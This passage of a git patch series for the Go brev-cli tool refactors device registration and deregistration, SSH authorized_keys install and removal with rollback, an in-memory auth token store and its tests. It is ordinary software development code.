nodev1connect.ExternalNodeServiceClient { +func NewNodeServiceClient(provider externalnode.TokenProvider, baseURL string) nodev1connect.ExternalNodeServiceClient { return nodev1connect.NewExternalNodeServiceClient( newAuthenticatedHTTPClient(provider), baseURL, diff --git a/pkg/cmd/register/rpcclient_test.go b/pkg/cmd/register/rpcclient_test.go index 561230949..69ea4bb2f 100644 --- a/pkg/cmd/register/rpcclient_test.go +++ b/pkg/cmd/register/rpcclient_test.go @@ -145,6 +145,7 @@ type fakeNodeService struct { nodev1connect.UnimplementedExternalNodeServiceHandler addNodeFn func(*nodev1.AddNodeRequest) (*nodev1.AddNodeResponse, error) removeNodeFn func(*nodev1.RemoveNodeRequest) (*nodev1.RemoveNodeResponse, error) + getNodeFn func(*nodev1.GetNodeRequest) (*nodev1.GetNodeResponse, error) } func (f *fakeNodeService) AddNode(_ context.Context, req *connect.Request[nodev1.AddNodeRequest]) (*connect.Response[nodev1.AddNodeResponse], error) { @@ -163,6 +164,17 @@ func (f *fakeNodeService) RemoveNode(_ context.Context, req *connect.Request[nod return connect.NewResponse(resp), nil } +func (f *fakeNodeService) GetNode(_ context.Context, req *connect.Request[nodev1.GetNodeRequest]) (*connect.Response[nodev1.GetNodeResponse], error) { + if f.getNodeFn == nil { + return nil, connect.NewError(connect.CodeUnimplemented, nil) + } + resp, err := f.getNodeFn(req.Msg) + if err != nil { + return nil, err + } + return connect.NewResponse(resp), nil +} + func Test_NewNodeServiceClient_AddNode(t *testing.T) { svc := &fakeNodeService{ addNodeFn: func(req *nodev1.AddNodeRequest) (*nodev1.AddNodeResponse, error) { diff --git a/pkg/cmd/register/sshkeys.go b/pkg/cmd/register/sshkeys.go index a12f7e3e8..1779349d1 100644 --- a/pkg/cmd/register/sshkeys.go +++ b/pkg/cmd/register/sshkeys.go @@ -33,11 +33,21 @@ func InstallAuthorizedKey(u *user.User, pubKey string) error { return fmt.Errorf("reading authorized_keys: %w", err) } - if strings.Contains(string(existing), pubKey) { - return nil // already present (tagged or not) + taggedKey := pubKey + " " + BrevKeyComment + + if strings.Contains(string(existing), taggedKey) { + return nil // already present with tag } - taggedKey := pubKey + " " + BrevKeyComment + // If the key exists but isn't tagged, replace it with the tagged version + // so that RemoveBrevAuthorizedKeys can find it later. + if strings.Contains(string(existing), pubKey) { + updated := strings.ReplaceAll(string(existing), pubKey, taggedKey) + if err := os.WriteFile(authKeysPath, []byte(updated), 0o600); err != nil { + return fmt.Errorf("writing authorized_keys: %w", err) + } + return nil + } // Ensure existing content ends with a newline before appending. content := string(existing) @@ -53,9 +63,15 @@ func InstallAuthorizedKey(u *user.User, pubKey string) error { return nil } -// RemoveBrevAuthorizedKeys removes all SSH keys tagged with the brev-cli -// comment from the user's ~/.ssh/authorized_keys. -func RemoveBrevAuthorizedKeys(u *user.User) error { +// RemoveAuthorizedKey removes a specific public key from the user's +// ~/.ssh/authorized_keys. It matches the key content regardless of whether +// the brev-cli comment tag is present. +func RemoveAuthorizedKey(u *user.User, pubKey string) error { + pubKey = strings.TrimSpace(pubKey) + if pubKey == "" { + return nil + } + authKeysPath := filepath.Join(u.HomeDir, ".ssh", "authorized_keys") existing, err := os.ReadFile(authKeysPath) // #nosec G304 @@ -68,7 +84,7 @@ func RemoveBrevAuthorizedKeys(u *user.User) error { var kept []string for _, line := range strings.Split(string(existing), "\n") { - if strings.Contains(line, BrevKeyComment) { + if strings.Contains(line, pubKey) { continue } kept = append(kept, line) @@ -80,3 +96,36 @@ func RemoveBrevAuthorizedKeys(u *user.User) error { } return nil } + +// RemoveBrevAuthorizedKeys removes all SSH keys tagged with the brev-cli +// comment from the user's ~/.ssh/authorized_keys. It returns the lines that +// were removed so callers can report what was cleaned up. +func RemoveBrevAuthorizedKeys(u *user.User) ([]string, error) { + authKeysPath := filepath.Join(u.HomeDir, ".ssh", "authorized_keys") + + existing, err := os.ReadFile(authKeysPath) // #nosec G304 + if err != nil { + if os.IsNotExist(err) { + return nil, nil + } + return nil, fmt.Errorf("reading authorized_keys: %w", err) + } + + var kept []string + var removed []string + for _, line := range strings.Split(string(existing), "\n") { + if strings.Contains(line, BrevKeyComment) { + if trimmed := strings.TrimSpace(line); trimmed != "" { + removed = append(removed, trimmed) + } + continue + } + kept = append(kept, line) + } + + result := strings.Join(kept, "\n") + if err := os.WriteFile(authKeysPath, []byte(result), 0o600); err != nil { + return nil, fmt.Errorf("writing authorized_keys: %w", err) + } + return removed, nil +} diff --git a/pkg/externalnode/types.go b/pkg/externalnode/types.go new file mode 100644 index 000000000..c149f0d6d --- /dev/null +++ b/pkg/externalnode/types.go @@ -0,0 +1,36 @@ +package externalnode + +import ( + nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" + + nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" +) + +// TokenProvider abstracts access token retrieval for authenticated RPC calls. +type TokenProvider interface { + GetAccessToken() (string, error) +} + +// PlatformChecker checks whether the current platform is supported. +type PlatformChecker interface { + IsCompatible() bool +} + +// NodeClientFactory creates ConnectRPC ExternalNodeService clients. +type NodeClientFactory interface { + NewNodeClient(provider TokenProvider, baseURL string) nodev1connect.ExternalNodeServiceClient +} + +// FriendlyNetworkStatus returns a human-readable label for a NetworkMemberStatus. +func FriendlyNetworkStatus(s nodev1.NetworkMemberStatus) string { + switch s { + case nodev1.NetworkMemberStatus_NETWORK_MEMBER_STATUS_CONNECTED: + return "Connected" + case nodev1.NetworkMemberStatus_NETWORK_MEMBER_STATUS_DISCONNECTED: + return "Disconnected" + case nodev1.NetworkMemberStatus_NETWORK_MEMBER_STATUS_UNSPECIFIED: + return "Registered" + default: + return "Unknown" + } +} diff --git a/pkg/store/memory_auth.go b/pkg/store/memory_auth.go new file mode 100644 index 000000000..5c004df72 --- /dev/null +++ b/pkg/store/memory_auth.go @@ -0,0 +1,44 @@ +package store + +import ( + "fmt" + + "github.com/brevdev/brev-cli/pkg/entity" + breverrors "github.com/brevdev/brev-cli/pkg/errors" +) + +// MemoryAuthStore implements auth.AuthStore with in-memory token storage. +// Tokens live only for the lifetime of the process — nothing is written to disk. +type MemoryAuthStore struct { + tokens *entity.AuthTokens +} + +func NewMemoryAuthStore() *MemoryAuthStore { + return &MemoryAuthStore{} +} + +func (m *MemoryAuthStore) SaveAuthTokens(tokens entity.AuthTokens) error { + if tokens.AccessToken == "" { + return fmt.Errorf("access token is empty") + } + m.tokens = &tokens + return nil +} + +func (m *MemoryAuthStore) GetAuthTokens() (*entity.AuthTokens, error) { + if m.tokens == nil { + return nil, &breverrors.CredentialsFileNotFound{} + } + return m.tokens, nil +} + +func (m *MemoryAuthStore) DeleteAuthTokens() error { + m.tokens = nil + return nil +} + +// Seed pre-fills the in-memory store, allowing the auth layer to skip login. +// Intended for future use where the user can supply a token +func (m *MemoryAuthStore) Seed(tokens entity.AuthTokens) { + m.tokens = &tokens +} diff --git a/pkg/store/memory_auth_test.go b/pkg/store/memory_auth_test.go new file mode 100644 index 000000000..330ea66e3 --- /dev/null +++ b/pkg/store/memory_auth_test.go @@ -0,0 +1,73 @@ +package store + +import ( + "testing" + + "github.com/brevdev/brev-cli/pkg/entity" + breverrors "github.com/brevdev/brev-cli/pkg/errors" +) + +func TestMemoryAuthStore_SaveAndGet_RoundTrips(t *testing.T) { + s := NewMemoryAuthStore() + tokens := entity.AuthTokens{AccessToken: "access", RefreshToken: "refresh"} + + if err := s.SaveAuthTokens(tokens); err != nil { + t.Fatalf("SaveAuthTokens: %v", err) + } + + got, err := s.GetAuthTokens() + if err != nil { + t.Fatalf("GetAuthTokens: %v", err) + } + if got.AccessToken != "access" || got.RefreshToken != "refresh" { + t.Fatalf("unexpected tokens: %+v", got) + } +} + +func TestMemoryAuthStore_GetAuthTokens_WhenEmpty_ReturnsCredentialsFileNotFound(t *testing.T) { + s := NewMemoryAuthStore() + + _, err := s.GetAuthTokens() + if err == nil { + t.Fatal("expected error, got nil") + } + if _, ok := err.(*breverrors.CredentialsFileNotFound); !ok { + t.Fatalf("expected *CredentialsFileNotFound, got %T: %v", err, err) + } +} + +func TestMemoryAuthStore_SaveAuthTokens_EmptyAccessToken_ReturnsError(t *testing.T) { + s := NewMemoryAuthStore() + + err := s.SaveAuthTokens(entity.AuthTokens{AccessToken: "", RefreshToken: "refresh"}) + if err == nil { + t.Fatal("expected error for empty access token, got nil") + } +} + +func TestMemoryAuthStore_DeleteAuthTokens_ClearsTokens(t *testing.T) { + s := NewMemoryAuthStore() + _ = s.SaveAuthTokens(entity.AuthTokens{AccessToken: "access", RefreshToken: "refresh"}) + + if err := s.DeleteAuthTokens(); err != nil { + t.Fatalf("DeleteAuthTokens: %v", err) + } + + _, err := s.GetAuthTokens() + if _, ok := err.(*breverrors.CredentialsFileNotFound); !ok { + t.Fatalf("expected *CredentialsFileNotFound after delete, got %T: %v", err, err) + } +} + +func TestMemoryAuthStore_Seed_PreFillsTokens(t *testing.T) { + s := NewMemoryAuthStore() + s.Seed(entity.AuthTokens{AccessToken: "seeded-access", RefreshToken: "seeded-refresh"}) + + got, err := s.GetAuthTokens() + if err != nil { + t.Fatalf("GetAuthTokens after Seed: %v", err) + } + if got.AccessToken != "seeded-access" || got.RefreshToken != "seeded-refresh" { + t.Fatalf("unexpected tokens after Seed: %+v", got) + } +} diff --git a/pkg/terminal/types.go b/pkg/terminal/types.go new file mode 100644 index 000000000..e7138531e --- /dev/null +++ b/pkg/terminal/types.go @@ -0,0 +1,11 @@ +package terminal + +// Confirmer prompts for yes/no confirmation. +type Confirmer interface { + ConfirmYesNo(label string) bool +} + +// Selector prompts the user to choose from a list of items. +type Selector interface { + Select(label string, items []string) string +} From b627ee5484b28f40b1820882c43e92fe17d9078f Mon Sep 17 00:00:00 2001 From: Pratik Patel Date: Tue, 3 Mar 2026 16:01:47 -0800 Subject: [PATCH 4/4] review feedback --- pkg/cmd/deregister/deregister.go | 20 ++--- pkg/cmd/deregister/deregister_test.go | 13 +-- pkg/cmd/enablessh/enablessh.go | 37 ++------ pkg/cmd/grantssh/grantssh.go | 32 ++----- pkg/cmd/register/register.go | 119 +++++++++++--------------- pkg/cmd/register/sshkeys.go | 47 ++++++++++ pkg/externalnode/types.go | 2 +- 7 files changed, 119 insertions(+), 151 deletions(-) diff --git a/pkg/cmd/deregister/deregister.go b/pkg/cmd/deregister/deregister.go index 2cb8d83d5..06b902ddb 100644 --- a/pkg/cmd/deregister/deregister.go +++ b/pkg/cmd/deregister/deregister.go @@ -67,7 +67,7 @@ func defaultDeregisterDeps(brevHome string) deregisterDeps { var ( deregisterLong = `Deregister your device from NVIDIA Brev -This command removes the local registration data and optionally uninstalls +This command removes the local registration data and uninstalls the Brev tunnel (network agent).` deregisterExample = ` brev deregister` @@ -158,19 +158,13 @@ func runDeregister(ctx context.Context, t *terminal.Terminal, s DeregisterStore, } t.Vprint("") - removeTunnel := deps.prompter.Select( - "Would you also like to remove the Brev tunnel?", - []string{"Yes, remove Brev tunnel", "No, keep Brev tunnel installed"}, - ) - if removeTunnel == "Yes, remove Brev tunnel" { - t.Vprint("Removing Brev tunnel...") - if err := deps.netbird.Uninstall(); err != nil { - t.Vprintf(" Warning: failed to remove Brev tunnel: %v\n", err) - } else { - t.Vprint(t.Green(" Brev tunnel removed.")) - } - t.Vprint("") + t.Vprint("Removing Brev tunnel...") + if err := deps.netbird.Uninstall(); err != nil { + t.Vprintf(" Warning: failed to remove Brev tunnel: %v\n", err) + } else { + t.Vprint(t.Green(" Brev tunnel removed.")) } + t.Vprint("") t.Vprint("Removing registration data...") if err := deps.registrationStore.Delete(); err != nil { diff --git a/pkg/cmd/deregister/deregister_test.go b/pkg/cmd/deregister/deregister_test.go index 20d2d2a5f..b901c9ff2 100644 --- a/pkg/cmd/deregister/deregister_test.go +++ b/pkg/cmd/deregister/deregister_test.go @@ -285,7 +285,7 @@ func Test_runDeregister_RemoveNodeFails(t *testing.T) { } } -func Test_runDeregister_SkipsNetbirdUninstall(t *testing.T) { +func Test_runDeregister_AlwaysUninstallsNetbird(t *testing.T) { regStore := &mockRegistrationStore{ reg: ®ister.DeviceRegistration{ ExternalNodeID: "unode_abc", @@ -309,13 +309,6 @@ func Test_runDeregister_SkipsNetbirdUninstall(t *testing.T) { netbird := &mockNetBirdManager{} deps, server := testDeregisterDeps(t, svc, regStore) defer server.Close() - - deps.prompter = mockSelector{fn: func(label string, _ []string) string { - if label == "Would you also like to remove the Brev tunnel?" { - return "No, keep Brev tunnel installed" - } - return "Yes, proceed" - }} deps.netbird = netbird term := terminal.New() @@ -324,8 +317,8 @@ func Test_runDeregister_SkipsNetbirdUninstall(t *testing.T) { t.Fatalf("runDeregister failed: %v", err) } - if netbird.called { - t.Error("Brev tunnel uninstall should not be called when user declines") + if !netbird.called { + t.Error("expected Brev tunnel uninstall to always be called during deregistration") } } diff --git a/pkg/cmd/enablessh/enablessh.go b/pkg/cmd/enablessh/enablessh.go index e54b5b35a..dac16bc88 100644 --- a/pkg/cmd/enablessh/enablessh.go +++ b/pkg/cmd/enablessh/enablessh.go @@ -8,11 +8,7 @@ import ( "os/exec" "os/user" - nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" - "connectrpc.com/connect" - "github.com/brevdev/brev-cli/pkg/cmd/register" - "github.com/brevdev/brev-cli/pkg/config" "github.com/brevdev/brev-cli/pkg/entity" breverrors "github.com/brevdev/brev-cli/pkg/errors" "github.com/brevdev/brev-cli/pkg/externalnode" @@ -87,12 +83,12 @@ func runEnableSSH(ctx context.Context, t *terminal.Terminal, s EnableSSHStore, d return breverrors.WrapAndTrace(err) } - return EnableSSH(ctx, t, deps.nodeClients, s, reg, brevUser) + return enableSSH(ctx, t, deps.nodeClients, s, reg, brevUser) } -// EnableSSH grants SSH access to the given node for the specified Brev user. -// It is exported so that the register command can reuse it after registration. -func EnableSSH( +// enableSSH grants SSH access to the given node for the current Brev user. +// This is the "reflexive grant" — granting yourself SSH access to the device. +func enableSSH( ctx context.Context, t *terminal.Terminal, nodeClients externalnode.NodeClientFactory, @@ -104,7 +100,6 @@ func EnableSSH( if err != nil { return fmt.Errorf("failed to determine current Linux user: %w", err) } - linuxUser := u.Username checkSSHDaemon(t) @@ -113,29 +108,11 @@ func EnableSSH( t.Vprint("") t.Vprintf(" Node: %s (%s)\n", reg.DisplayName, reg.ExternalNodeID) t.Vprintf(" Brev user: %s\n", brevUser.ID) - t.Vprintf(" Linux user: %s\n", linuxUser) + t.Vprintf(" Linux user: %s\n", u.Username) t.Vprint("") - if brevUser.PublicKey != "" { - if err := register.InstallAuthorizedKey(u, brevUser.PublicKey); err != nil { - t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to install SSH public key: %v", err))) - } else { - t.Vprint(" Brev public key added to authorized_keys.") - } - } - - client := nodeClients.NewNodeClient(tokenProvider, config.GlobalConfig.GetBrevPublicAPIURL()) - if _, err := client.GrantNodeSSHAccess(ctx, connect.NewRequest(&nodev1.GrantNodeSSHAccessRequest{ - ExternalNodeId: reg.ExternalNodeID, - UserId: brevUser.ID, - LinuxUser: linuxUser, - })); err != nil { - if brevUser.PublicKey != "" { - if rerr := register.RemoveAuthorizedKey(u, brevUser.PublicKey); rerr != nil { - t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to remove SSH key after failed grant: %v", rerr))) - } - } - return fmt.Errorf("failed to enable SSH access: %w", err) + if err := register.GrantSSHAccessToNode(ctx, t, nodeClients, tokenProvider, reg, brevUser, u); err != nil { + return fmt.Errorf("enable SSH failed: %w", err) } t.Vprint(t.Green(fmt.Sprintf("SSH access enabled. You can now SSH to this device via: brev shell %s", reg.DisplayName))) diff --git a/pkg/cmd/grantssh/grantssh.go b/pkg/cmd/grantssh/grantssh.go index bea36fac1..72543e196 100644 --- a/pkg/cmd/grantssh/grantssh.go +++ b/pkg/cmd/grantssh/grantssh.go @@ -10,11 +10,7 @@ import ( "path/filepath" "strings" - nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" - "connectrpc.com/connect" - "github.com/brevdev/brev-cli/pkg/cmd/register" - "github.com/brevdev/brev-cli/pkg/config" "github.com/brevdev/brev-cli/pkg/entity" breverrors "github.com/brevdev/brev-cli/pkg/errors" "github.com/brevdev/brev-cli/pkg/externalnode" @@ -139,26 +135,8 @@ func runGrantSSH(ctx context.Context, t *terminal.Terminal, s GrantSSHStore, dep t.Vprintf(" Linux user: %s\n", linuxUser) t.Vprint("") - if selectedUser.PublicKey != "" { - if err := register.InstallAuthorizedKey(osUser, selectedUser.PublicKey); err != nil { - t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to install SSH public key: %v", err))) - } else { - t.Vprint(" Brev public key added to authorized_keys.") - } - } - - client := deps.nodeClients.NewNodeClient(s, config.GlobalConfig.GetBrevPublicAPIURL()) - if _, err := client.GrantNodeSSHAccess(ctx, connect.NewRequest(&nodev1.GrantNodeSSHAccessRequest{ - ExternalNodeId: reg.ExternalNodeID, - UserId: selectedUser.ID, - LinuxUser: linuxUser, - })); err != nil { - if selectedUser.PublicKey != "" { - if rerr := register.RemoveAuthorizedKey(osUser, selectedUser.PublicKey); rerr != nil { - t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to remove SSH key after failed grant: %v", rerr))) - } - } - return fmt.Errorf("failed to grant SSH access: %w", err) + if err := register.GrantSSHAccessToNode(ctx, t, deps.nodeClients, s, reg, selectedUser, osUser); err != nil { + return fmt.Errorf("grant SSH failed: %w", err) } t.Vprint(t.Green(fmt.Sprintf("SSH access granted for %s. They can now SSH to this device via: brev shell %s", selectedUser.Name, reg.DisplayName))) @@ -170,7 +148,7 @@ func runGrantSSH(ctx context.Context, t *terminal.Terminal, s GrantSSHStore, dep func checkSSHEnabled(currentUserPubKey string) error { currentUserPubKey = strings.TrimSpace(currentUserPubKey) if currentUserPubKey == "" { - return fmt.Errorf("SSH has not been enabled on this device. Run 'brev enable-ssh' first.") + return fmt.Errorf("curren user does not have a Brev public key") } u, err := user.Current() @@ -181,11 +159,11 @@ func checkSSHEnabled(currentUserPubKey string) error { authKeysPath := filepath.Join(u.HomeDir, ".ssh", "authorized_keys") existing, err := os.ReadFile(authKeysPath) // #nosec G304 if err != nil { - return fmt.Errorf("SSH has not been enabled on this device. Run 'brev enable-ssh' first.") + return fmt.Errorf("failed to read authorized_keys, %w", err) } if !strings.Contains(string(existing), currentUserPubKey) { - return fmt.Errorf("SSH has not been enabled on this device. Run 'brev enable-ssh' first.") + return fmt.Errorf("run 'brev enable-ssh' first") } return nil diff --git a/pkg/cmd/register/register.go b/pkg/cmd/register/register.go index f041df738..e56c0e6c1 100644 --- a/pkg/cmd/register/register.go +++ b/pkg/cmd/register/register.go @@ -109,9 +109,8 @@ func NewCmdRegister(t *terminal.Terminal, store RegisterStore) *cobra.Command { } func runRegister(ctx context.Context, t *terminal.Terminal, s RegisterStore, name string, deps registerDeps) error { //nolint:funlen // registration flow - org, err := getOrgToRegisterFor(deps, s) - if err != nil { - return err + if !deps.platform.IsCompatible() { + return breverrors.New("brev register is only supported on Linux") } alreadyRegistered, err := deps.registrationStore.Exists() @@ -130,7 +129,10 @@ func runRegister(ctx context.Context, t *terminal.Terminal, s RegisterStore, nam if err != nil { return breverrors.WrapAndTrace(err) } - + org, err := getOrgToRegisterFor(s) + if err != nil { + return breverrors.WrapAndTrace(err) + } osUser, err := user.Current() if err != nil { return fmt.Errorf("failed to determine current Linux user: %w", err) @@ -203,18 +205,7 @@ func runRegister(ctx context.Context, t *terminal.Terminal, s RegisterStore, nam t.Vprint(t.Green(" Registration complete.")) - ci := node.GetConnectivityInfo() - if ci == nil || ci.GetRegistrationCommand() == "" { - t.Vprintf(" %s\n", t.Yellow("Warning: Brev tunnel setup failed, please try again.")) - } else { - if err := deps.setupRunner.RunSetup(ci.GetRegistrationCommand()); err != nil { - t.Vprintf(" Warning: setup command failed: %v\n", err) - } else { - // netbird up reconfigures network routes; give them a moment - // to settle before making further RPC calls. - time.Sleep(2 * time.Second) - } - } + runSetup(node, t, deps) if deps.prompter.ConfirmYesNo("Would you like to enable SSH access to this device?") { grantSSHAccess(ctx, t, deps, s, reg, brevUser, osUser) @@ -223,59 +214,7 @@ func runRegister(ctx context.Context, t *terminal.Terminal, s RegisterStore, nam return nil } -func grantSSHAccess(ctx context.Context, t *terminal.Terminal, deps registerDeps, tokenProvider externalnode.TokenProvider, reg *DeviceRegistration, brevUser *entity.User, osUser *user.User) { - t.Vprint("") - t.Vprint(t.Green("Enabling SSH access on this device")) - t.Vprint("") - t.Vprintf(" Node: %s (%s)\n", reg.DisplayName, reg.ExternalNodeID) - t.Vprintf(" Brev user: %s\n", brevUser.ID) - t.Vprintf(" Linux user: %s\n", osUser.Username) - t.Vprint("") - - if brevUser.PublicKey != "" { - if err := InstallAuthorizedKey(osUser, brevUser.PublicKey); err != nil { - t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to install SSH public key: %v", err))) - } else { - t.Vprint(" Brev public key added to authorized_keys.") - } - } - - client := deps.nodeClients.NewNodeClient(tokenProvider, config.GlobalConfig.GetBrevPublicAPIURL()) - req := connect.NewRequest(&nodev1.GrantNodeSSHAccessRequest{ - ExternalNodeId: reg.ExternalNodeID, - UserId: brevUser.ID, - LinuxUser: osUser.Username, - }) - - _, err := client.GrantNodeSSHAccess(ctx, req) - if err != nil { - t.Vprint(" Retrying in 3 seconds...") - time.Sleep(3 * time.Second) - _, err = client.GrantNodeSSHAccess(ctx, req) - } - if err != nil { - t.Vprintf(" Warning: failed to enable SSH: %v\n", err) - if brevUser.PublicKey != "" { - if rerr := RemoveAuthorizedKey(osUser, brevUser.PublicKey); rerr != nil { - t.Vprintf(" Warning: failed to remove SSH key after failed grant: %v\n", rerr) - } - } - return - } - - t.Vprint(t.Green(fmt.Sprintf("SSH access enabled. You can now SSH to this device via: brev shell %s", reg.DisplayName))) -} - -func getOrgToRegisterFor(deps registerDeps, s RegisterStore) (*entity.Organization, error) { - if !deps.platform.IsCompatible() { - return nil, fmt.Errorf("brev register is only supported on Linux") - } - - _, err := s.GetCurrentUser() // ensure active token - if err != nil { - return nil, breverrors.WrapAndTrace(err) - } - +func getOrgToRegisterFor(s RegisterStore) (*entity.Organization, error) { org, err := s.GetActiveOrganizationOrDefault() if err != nil { return nil, breverrors.WrapAndTrace(err) @@ -305,8 +244,10 @@ func checkExistingRegistration(ctx context.Context, t *terminal.Terminal, s Regi })) if err != nil { t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: could not fetch node status: %v", err))) + } else if node := resp.Msg.GetExternalNode(); node == nil { + t.Vprintf(" %s\n", t.Yellow("Warning: could not fetch node connectivity info")) } else { - ci := resp.Msg.GetExternalNode().GetConnectivityInfo() + ci := node.GetConnectivityInfo() if ci != nil && ci.GetStatus() == nodev1.NetworkMemberStatus_NETWORK_MEMBER_STATUS_CONNECTED { t.Vprint(t.Green(" Node is connected.")) t.Vprint("") @@ -373,3 +314,41 @@ func netbirdManagementConnected(statusOutput string) bool { } return false } + +func runSetup(node *nodev1.ExternalNode, t *terminal.Terminal, deps registerDeps) { + ci := node.GetConnectivityInfo() + if ci == nil || ci.GetRegistrationCommand() == "" { + t.Vprintf(" %s\n", t.Yellow("Warning: Brev tunnel setup failed, please try again.")) + } else { + if err := deps.setupRunner.RunSetup(ci.GetRegistrationCommand()); err != nil { + t.Vprintf(" Warning: setup command failed: %v\n", err) + } else { + // netbird up reconfigures network routes; give them a moment + // to settle before making further RPC calls. + time.Sleep(2 * time.Second) + } + } +} + +func grantSSHAccess(ctx context.Context, t *terminal.Terminal, deps registerDeps, tokenProvider externalnode.TokenProvider, reg *DeviceRegistration, brevUser *entity.User, osUser *user.User) { + t.Vprint("") + t.Vprint(t.Green("Enabling SSH access on this device")) + t.Vprint("") + t.Vprintf(" Node: %s (%s)\n", reg.DisplayName, reg.ExternalNodeID) + t.Vprintf(" Brev user: %s\n", brevUser.ID) + t.Vprintf(" Linux user: %s\n", osUser.Username) + t.Vprint("") + + err := GrantSSHAccessToNode(ctx, t, deps.nodeClients, tokenProvider, reg, brevUser, osUser) + if err != nil { + t.Vprint(" Retrying in 3 seconds...") + time.Sleep(3 * time.Second) + err = GrantSSHAccessToNode(ctx, t, deps.nodeClients, tokenProvider, reg, brevUser, osUser) + } + if err != nil { + t.Vprintf(" Warning: %v\n", err) + return + } + + t.Vprint(t.Green(fmt.Sprintf("SSH access enabled. You can now SSH to this device via: brev shell %s", reg.DisplayName))) +} diff --git a/pkg/cmd/register/sshkeys.go b/pkg/cmd/register/sshkeys.go index 1779349d1..db36f01b4 100644 --- a/pkg/cmd/register/sshkeys.go +++ b/pkg/cmd/register/sshkeys.go @@ -1,17 +1,64 @@ package register import ( + "context" "fmt" "os" "os/user" "path/filepath" "strings" + + nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" + "connectrpc.com/connect" + + "github.com/brevdev/brev-cli/pkg/config" + "github.com/brevdev/brev-cli/pkg/entity" + "github.com/brevdev/brev-cli/pkg/externalnode" + "github.com/brevdev/brev-cli/pkg/terminal" ) // BrevKeyComment is the marker appended to every SSH key that Brev installs. // It allows RemoveBrevAuthorizedKeys to identify and remove exactly those keys. const BrevKeyComment = "# brev-cli" +// GrantSSHAccessToNode installs the user's public key in authorized_keys and +// calls GrantNodeSSHAccess to record access server-side. If the RPC fails, +// the installed key is rolled back. +func GrantSSHAccessToNode( + ctx context.Context, + t *terminal.Terminal, + nodeClients externalnode.NodeClientFactory, + tokenProvider externalnode.TokenProvider, + reg *DeviceRegistration, + targetUser *entity.User, + osUser *user.User, +) error { + if targetUser.PublicKey != "" { + if err := InstallAuthorizedKey(osUser, targetUser.PublicKey); err != nil { + t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to install SSH public key: %v", err))) + } else { + t.Vprint(" Brev public key added to authorized_keys.") + } + } + + client := nodeClients.NewNodeClient(tokenProvider, config.GlobalConfig.GetBrevPublicAPIURL()) + _, err := client.GrantNodeSSHAccess(ctx, connect.NewRequest(&nodev1.GrantNodeSSHAccessRequest{ + ExternalNodeId: reg.ExternalNodeID, + UserId: targetUser.ID, + LinuxUser: osUser.Username, + })) + if err != nil { + if targetUser.PublicKey != "" { + if rerr := RemoveAuthorizedKey(osUser, targetUser.PublicKey); rerr != nil { + t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to remove SSH key after failed grant: %v", rerr))) + } + } + return fmt.Errorf("failed to grant SSH access: %w", err) + } + + return nil +} + // InstallAuthorizedKey appends the given public key to the user's // ~/.ssh/authorized_keys if it isn't already present. The key is tagged with // a brev-cli comment so it can be removed later by RemoveBrevAuthorizedKeys. diff --git a/pkg/externalnode/types.go b/pkg/externalnode/types.go index c149f0d6d..e09f9ceaa 100644 --- a/pkg/externalnode/types.go +++ b/pkg/externalnode/types.go @@ -29,7 +29,7 @@ func FriendlyNetworkStatus(s nodev1.NetworkMemberStatus) string { case nodev1.NetworkMemberStatus_NETWORK_MEMBER_STATUS_DISCONNECTED: return "Disconnected" case nodev1.NetworkMemberStatus_NETWORK_MEMBER_STATUS_UNSPECIFIED: - return "Registered" + return "Unknown" default: return "Unknown" }